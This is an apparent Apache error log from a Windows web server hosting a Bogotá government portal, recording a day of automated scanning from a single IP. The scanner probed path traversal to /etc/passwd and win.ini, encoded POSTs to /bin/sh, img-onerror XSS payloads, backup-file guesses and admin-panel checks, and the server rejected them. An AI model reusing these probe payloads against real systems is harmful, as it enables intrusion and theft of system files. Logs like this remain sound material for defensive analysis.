[Thu Jun 02 05:37:24.990323 2022] [cgi:error] [pid 8808:tid 21052] [client 46.101.1.185:50104] script not found or unable to stat: E:/nuevo/htdocs/free_time_failed.cgi
[Thu Jun 02 05:37:25.302324 2022] [cgi:error] [pid 8808:tid 20592] [client 46.101.1.185:50122] script not found or unable to stat: E:/nuevo/cgi-bin/awstats
[Thu Jun 02 05:37:26.409925 2022] [core:error] [pid 8808:tid 20708] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:50208] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:37:26.799926 2022] [core:error] [pid 8808:tid 20792] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:50238] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql HTTP/1.1 to file
[Thu Jun 02 05:37:26.831126 2022] [negotiation:error] [pid 8808:tid 21244] [client 46.101.1.185:50240] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: portal.ambientebogota.gov.co:80/user/register
[Thu Jun 02 05:37:27.049527 2022] [authz_core:error] [pid 8808:tid 21260] [client 46.101.1.185:50256] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/setup/index.php
[Thu Jun 02 05:37:27.080727 2022] [cgi:error] [pid 8808:tid 21272] [client 46.101.1.185:50258] script not found or unable to stat: E:/nuevo/cgi-bin/system_mgr.cgi
[Thu Jun 02 05:37:27.111927 2022] [core:error] [pid 8808:tid 20816] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:50262] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80_db.sql HTTP/1.1 to file
[Thu Jun 02 05:37:27.392727 2022] [cgi:error] [pid 8808:tid 21260] [client 46.101.1.185:50284] script not found or unable to stat: E:/nuevo/cgi-bin/system_mgr.cgi
[Thu Jun 02 05:37:27.829528 2022] [core:error] [pid 8808:tid 20876] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:50320] AH00127: Cannot map POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 to file
[Thu Jun 02 05:37:27.954328 2022] [cgi:error] [pid 8808:tid 20964] [client 46.101.1.185:50330] script not found or unable to stat: E:/nuevo/htdocs/overview.asp
[Thu Jun 02 05:37:28.125928 2022] [cgi:error] [pid 8808:tid 20964] [client 46.101.1.185:50342] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi
[Thu Jun 02 05:37:29.077530 2022] [core:error] [pid 8808:tid 20792] [client 46.101.1.185:50418] AH00126: Invalid URI in request POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
[Thu Jun 02 05:37:29.389531 2022] [core:error] [pid 8808:tid 20816] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:50492] AH00127: Cannot map GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('2A192VlNAzGDQUN3b3T7fiPZByz')%3elujb7/admin/imgProcess.cfm HTTP/1.1 to file
[Thu Jun 02 05:37:29.826331 2022] [core:error] [pid 8808:tid 20552] [client 46.101.1.185:50088] AH00126: Invalid URI in request helo target
[Thu Jun 02 05:37:30.216332 2022] [authz_core:error] [pid 8808:tid 20888] [client 46.101.1.185:50842] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/
[Thu Jun 02 05:37:30.216332 2022] [core:error] [pid 8808:tid 21160] [client 46.101.1.185:50846] AH00126: Invalid URI in request t3 12.2.1
[Thu Jun 02 05:37:30.341132 2022] [core:error] [pid 8808:tid 21232] [client 46.101.1.185:50884] AH00126: Invalid URI in request GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1, referer: portal.ambientebogota.gov.co:80
[Thu Jun 02 05:37:30.606333 2022] [core:error] [pid 8808:tid 20816] [client 46.101.1.185:50992] AH00126: Invalid URI in request GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Thu Jun 02 05:37:30.887133 2022] [cgi:error] [pid 8808:tid 21232] [client 46.101.1.185:51098] script not found or unable to stat: E:/nuevo/cgi-bin/readycloud_control.cgi
[Thu Jun 02 05:37:30.918333 2022] [core:error] [pid 8808:tid 20888] [client 46.101.1.185:51114] AH00126: Invalid URI in request POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
[Thu Jun 02 05:37:31.479934 2022] [cgi:error] [pid 8808:tid 20928] [client 46.101.1.185:51328] script not found or unable to stat: E:/nuevo/cgi-bin/slogin
[Thu Jun 02 05:37:32.462736 2022] [core:error] [pid 8808:tid 21096] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:51716] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.7z HTTP/1.1 to file
[Thu Jun 02 05:37:32.774737 2022] [core:error] [pid 8808:tid 21272] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:51834] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.bz2 HTTP/1.1 to file
[Thu Jun 02 05:37:33.102337 2022] [core:error] [pid 8808:tid 21232] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:51962] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.gz HTTP/1.1 to file
[Thu Jun 02 05:37:33.336338 2022] [cgi:error] [pid 8808:tid 20528] [client 46.101.1.185:52058] script not found or unable to stat: E:/nuevo/htdocs/password_change.cgi, referer: http://portal.ambientebogota.gov.co:80
[Thu Jun 02 05:37:33.398738 2022] [core:error] [pid 8808:tid 20888] [client 46.101.1.185:52074] AH00126: Invalid URI in request GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1
[Thu Jun 02 05:37:33.414338 2022] [core:error] [pid 8808:tid 21260] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52090] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.lz HTTP/1.1 to file
[Thu Jun 02 05:37:33.663938 2022] [core:error] [pid 8808:tid 21272] [client 46.101.1.185:52188] AH00126: Invalid URI in request t3 12.2.1
[Thu Jun 02 05:37:33.726338 2022] [core:error] [pid 8808:tid 21096] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52216] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.rar HTTP/1.1 to file
[Thu Jun 02 05:37:34.038339 2022] [core:error] [pid 8808:tid 20816] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52342] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.tar.gz HTTP/1.1 to file
[Thu Jun 02 05:37:34.225539 2022] [core:error] [pid 8808:tid 20816] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52412] AH00127: Cannot map GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1 to file
[Thu Jun 02 05:37:34.350339 2022] [core:error] [pid 8808:tid 21232] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52470] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.xz HTTP/1.1 to file
[Thu Jun 02 05:37:34.662340 2022] [core:error] [pid 8808:tid 21260] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52590] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.zip HTTP/1.1 to file
[Thu Jun 02 05:37:34.911940 2022] [core:error] [pid 8808:tid 20816] [client 46.101.1.185:52692] AH00126: Invalid URI in request GET /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:37:34.989941 2022] [core:error] [pid 8808:tid 20608] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52722] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.z HTTP/1.1 to file
[Thu Jun 02 05:37:34.989941 2022] [core:error] [pid 8808:tid 20996] [client 46.101.1.185:50758] AH00126: Invalid URI in request helo target
[Thu Jun 02 05:37:35.301941 2022] [core:error] [pid 8808:tid 21272] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52780] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.tar.z HTTP/1.1 to file
[Thu Jun 02 05:37:35.613942 2022] [core:error] [pid 8808:tid 21232] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52824] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.db HTTP/1.1 to file
[Thu Jun 02 05:37:35.660742 2022] [cgi:error] [pid 8808:tid 20608] [client 46.101.1.185:52832] script not found or unable to stat: E:/nuevo/htdocs/netcore_get.cgi
[Thu Jun 02 05:37:35.925942 2022] [core:error] [pid 8808:tid 21260] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:52946] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sqlite HTTP/1.1 to file
[Thu Jun 02 05:37:35.972742 2022] [cgi:error] [pid 8808:tid 21272] [client 46.101.1.185:52970] script not found or unable to stat: E:/nuevo/cgi-bin/tsaupload.cgi
[Thu Jun 02 05:37:36.253543 2022] [core:error] [pid 8808:tid 21112] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:53068] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sqlitedb HTTP/1.1 to file
[Thu Jun 02 05:37:36.253543 2022] [cgi:error] [pid 8808:tid 20876] [client 46.101.1.185:53070] script not found or unable to stat: E:/nuevo/htdocs/log_download.cgi
[Thu Jun 02 05:37:36.565543 2022] [core:error] [pid 8808:tid 20528] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:53190] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.7z HTTP/1.1 to file
[Thu Jun 02 05:37:36.565543 2022] [cgi:error] [pid 8808:tid 21232] [client 46.101.1.185:53192] script not found or unable to stat: E:/nuevo/htdocs/log_download.cgi
[Thu Jun 02 05:37:36.877544 2022] [core:error] [pid 8808:tid 21260] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:53310] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.bz2 HTTP/1.1 to file
[Thu Jun 02 05:37:37.189544 2022] [core:error] [pid 8808:tid 20792] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:53438] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.gz HTTP/1.1 to file
[Thu Jun 02 05:37:37.517145 2022] [core:error] [pid 8808:tid 21272] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:53566] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.lz HTTP/1.1 to file
[Thu Jun 02 05:37:37.673145 2022] [cgi:error] [pid 8808:tid 21096] [client 46.101.1.185:53638] script not found or unable to stat: E:/nuevo/cgi-bin/file_transfer.cgi
[Thu Jun 02 05:37:37.829146 2022] [core:error] [pid 8808:tid 20912] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:53690] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.rar HTTP/1.1 to file
[Thu Jun 02 05:37:37.985146 2022] [cgi:error] [pid 8808:tid 21260] [client 46.101.1.185:53760] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Thu Jun 02 05:37:38.156746 2022] [core:error] [pid 8808:tid 21112] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:53814] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.tar.gz HTTP/1.1 to file
[Thu Jun 02 05:37:38.468747 2022] [core:error] [pid 8808:tid 21160] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:53930] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.xz HTTP/1.1 to file
[Thu Jun 02 05:37:38.780747 2022] [core:error] [pid 8808:tid 20528] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:54054] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.zip HTTP/1.1 to file
[Thu Jun 02 05:37:38.921147 2022] [cgi:error] [pid 8808:tid 21260] [client 46.101.1.185:54104] script not found or unable to stat: E:/nuevo/cgi-bin/wapopen
[Thu Jun 02 05:37:39.092748 2022] [core:error] [pid 8808:tid 21160] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:54172] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.z HTTP/1.1 to file
[Thu Jun 02 05:37:39.201948 2022] [cgi:error] [pid 8808:tid 21096] [client 46.101.1.185:54212] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:37:39.420348 2022] [core:error] [pid 8808:tid 21244] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:54292] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.sql.tar.z HTTP/1.1 to file
[Thu Jun 02 05:37:40.215950 2022] [cgi:error] [pid 8808:tid 20392] [client 46.101.1.185:54616] script not found or unable to stat: E:/nuevo/cgi-bin/execute_cmd.cgi
[Thu Jun 02 05:37:40.262750 2022] [cgi:error] [pid 8808:tid 20340] [client 46.101.1.185:54636] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:37:40.356350 2022] [core:error] [pid 8808:tid 21260] [client 46.101.1.185:54660] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:41.276752 2022] [cgi:error] [pid 8808:tid 20344] [client 46.101.1.185:54846] script not found or unable to stat: E:/nuevo/htdocs/apply.cgi
[Thu Jun 02 05:37:41.635552 2022] [cgi:error] [pid 8808:tid 20608] [client 46.101.1.185:54916] script not found or unable to stat: E:/nuevo/cgi-bin/mainfunction.cgi
[Thu Jun 02 05:37:41.885153 2022] [cgi:error] [pid 8808:tid 20332] [client 46.101.1.185:54944] script not found or unable to stat: E:/nuevo/cgi-bin/rpc
[Thu Jun 02 05:37:42.243953 2022] [core:error] [pid 8808:tid 20356] [client 46.101.1.185:54996] AH00126: Invalid URI in request GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
[Thu Jun 02 05:37:42.243953 2022] [negotiation:error] [pid 8808:tid 20996] [client 46.101.1.185:55008] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:56:57.581983 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 06:07:50.225729 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 06:13:26.671520 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 06:59:25.833766 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 07:44:01.051265 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 09:23:41.510969 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 09:31:02.648544 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 10:18:21.979331 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 10:54:10.431705 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 11:11:03.825085 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 11:35:22.818647 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 11:40:00.171534 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 12:15:34.848084 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 13:00:12.671787 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 13:01:07.474683 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 13:08:49.953096 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 13:45:55.422805 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 14:04:26.285156 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 14:08:22.594371 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 14:09:52.653329 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 14:25:31.495178 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 14:48:33.080405 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 15:03:37.055192 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 15:23:21.457073 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 15:24:33.497999 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 15:40:53.023720 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 15:58:00.410324 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 15:59:24.681672 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 16:06:40.843838 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 16:27:40.546051 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 16:31:05.577211 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 16:31:30.958456 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 16:45:36.027540 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 16:52:45.121893 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 17:08:34.088160 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 17:20:44.169443 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 17:43:12.620211 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 17:44:22.118333 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 17:49:43.556898 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 19:04:17.038355 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 19:17:16.197324 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 19:25:19.501772 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 20:18:24.435567 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 20:48:58.952989 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 20:50:03.303102 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 20:56:20.074964 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 21:14:03.154431 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 21:17:38.668809 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 21:26:20.567726 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] script not found or unable to stat: E:/nuevo/htdocs/admin.asp
[Thu Jun 02 21:26:23.750132 2022] [cgi:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] script not found or unable to stat: E:/nuevo/htdocs/administrator.asp
[Thu Jun 02 21:26:24.982534 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] script not found or unable to stat: E:/nuevo/htdocs/administrator.pl
[Thu Jun 02 21:26:27.135337 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] script not found or unable to stat: E:/nuevo/htdocs/admin.pl
[Thu Jun 02 21:26:29.787342 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] script not found or unable to stat: E:/nuevo/cgi-bin/sqwebmail
[Thu Jun 02 21:26:30.972944 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] script not found or unable to stat: E:/nuevo/htdocs/default.asp
[Thu Jun 02 21:26:32.470547 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] script not found or unable to stat: E:/nuevo/htdocs/login.asp
[Thu Jun 02 21:26:33.219348 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] script not found or unable to stat: E:/nuevo/htdocs/login.pl
[Thu Jun 02 21:26:33.702949 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] script not found or unable to stat: E:/nuevo/htdocs/logon.asp
[Thu Jun 02 21:26:34.358150 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] script not found or unable to stat: E:/nuevo/htdocs/logon.pl
[Thu Jun 02 21:26:37.649756 2022] [authz_core:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/
[Thu Jun 02 21:26:37.712156 2022] [authz_core:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/
[Thu Jun 02 21:26:37.914956 2022] [authz_core:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/index.php
[Thu Jun 02 21:26:44.217367 2022] [authz_core:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] AH01630: client denied by server configuration: E:/nuevo/htdocs/.hta
[Thu Jun 02 21:26:44.310968 2022] [authz_core:error] [pid 8808:tid 20920] [client 46.101.1.185:54002] AH01630: client denied by server configuration: E:/nuevo/htdocs/.htaccess
[Thu Jun 02 21:26:44.435768 2022] [authz_core:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] AH01630: client denied by server configuration: E:/nuevo/htdocs/.htpasswd
[Thu Jun 02 21:27:05.074604 2022] [cgi:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] script not found or unable to stat: E:/nuevo/htdocs/AT-admin.cgi
[Thu Jun 02 21:27:44.948274 2022] [cgi:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] script not found or unable to stat: E:/nuevo/htdocs/admin.cgi
[Thu Jun 02 21:28:14.432326 2022] [core:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] AH00038: Forbidden: E:/nuevo/htdocs/aux doesn't point to a file or directory
[Thu Jun 02 21:28:37.769967 2022] [cgi:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] script not found or unable to stat: E:/nuevo/htdocs/cachemgr.cgi
[Thu Jun 02 21:28:48.237585 2022] [cgi:error] [pid 8808:tid 20704] [client 46.101.1.185:56268] attempt to invoke directory as script: E:/nuevo/cgi-bin/
[Thu Jun 02 21:29:02.839211 2022] [core:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] AH00038: Forbidden: E:/nuevo/htdocs/com1 doesn't point to a file or directory
[Thu Jun 02 21:29:03.073211 2022] [core:error] [pid 8808:tid 20704] [client 46.101.1.185:56268] AH00038: Forbidden: E:/nuevo/htdocs/com2 doesn't point to a file or directory
[Thu Jun 02 21:29:03.088811 2022] [core:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] AH00038: Forbidden: E:/nuevo/htdocs/com3 doesn't point to a file or directory
[Thu Jun 02 21:29:03.744013 2022] [core:error] [pid 8808:tid 20704] [client 46.101.1.185:56268] AH00038: Forbidden: E:/nuevo/htdocs/com4 doesn't point to a file or directory
[Thu Jun 02 21:29:08.642421 2022] [core:error] [pid 8808:tid 20704] [client 46.101.1.185:56268] AH00038: Forbidden: E:/nuevo/htdocs/con doesn't point to a file or directory
[Thu Jun 02 21:30:10.605730 2022] [proxy:error] [pid 8808:tid 21016] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Thu Jun 02 21:30:10.605730 2022] [proxy_ajp:error] [pid 8808:tid 21016] [client 46.101.1.185:53992] AH00896: failed to make connection to backend: 127.0.0.1
[Thu Jun 02 21:31:40.914289 2022] [authz_core:error] [pid 8808:tid 21016] [client 46.101.1.185:59392] AH01630: client denied by server configuration: E:/nuevo/licenses/
[Thu Jun 02 21:31:50.773506 2022] [core:error] [pid 8808:tid 21016] [client 46.101.1.185:59392] AH00038: Forbidden: E:/nuevo/htdocs/lpt1 doesn't point to a file or directory
[Thu Jun 02 21:31:50.820306 2022] [core:error] [pid 8808:tid 20704] [client 46.101.1.185:56268] AH00038: Forbidden: E:/nuevo/htdocs/lpt2 doesn't point to a file or directory
[Thu Jun 02 21:32:30.913376 2022] [core:error] [pid 8808:tid 20704] [client 46.101.1.185:56268] AH00038: Forbidden: E:/nuevo/htdocs/nul doesn't point to a file or directory
[Thu Jun 02 21:32:57.963824 2022] [authz_core:error] [pid 8808:tid 20704] [client 46.101.1.185:56268] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Thu Jun 02 21:32:58.088624 2022] [authz_core:error] [pid 8808:tid 21016] [client 46.101.1.185:59392] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin2
[Thu Jun 02 21:33:00.272628 2022] [authz_core:error] [pid 8808:tid 21016] [client 46.101.1.185:59392] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpmyadmin2
[Thu Jun 02 21:33:06.699839 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 21:33:19.803862 2022] [core:error] [pid 8808:tid 20704] [client 46.101.1.185:56268] AH00038: Forbidden: E:/nuevo/htdocs/prn doesn't point to a file or directory
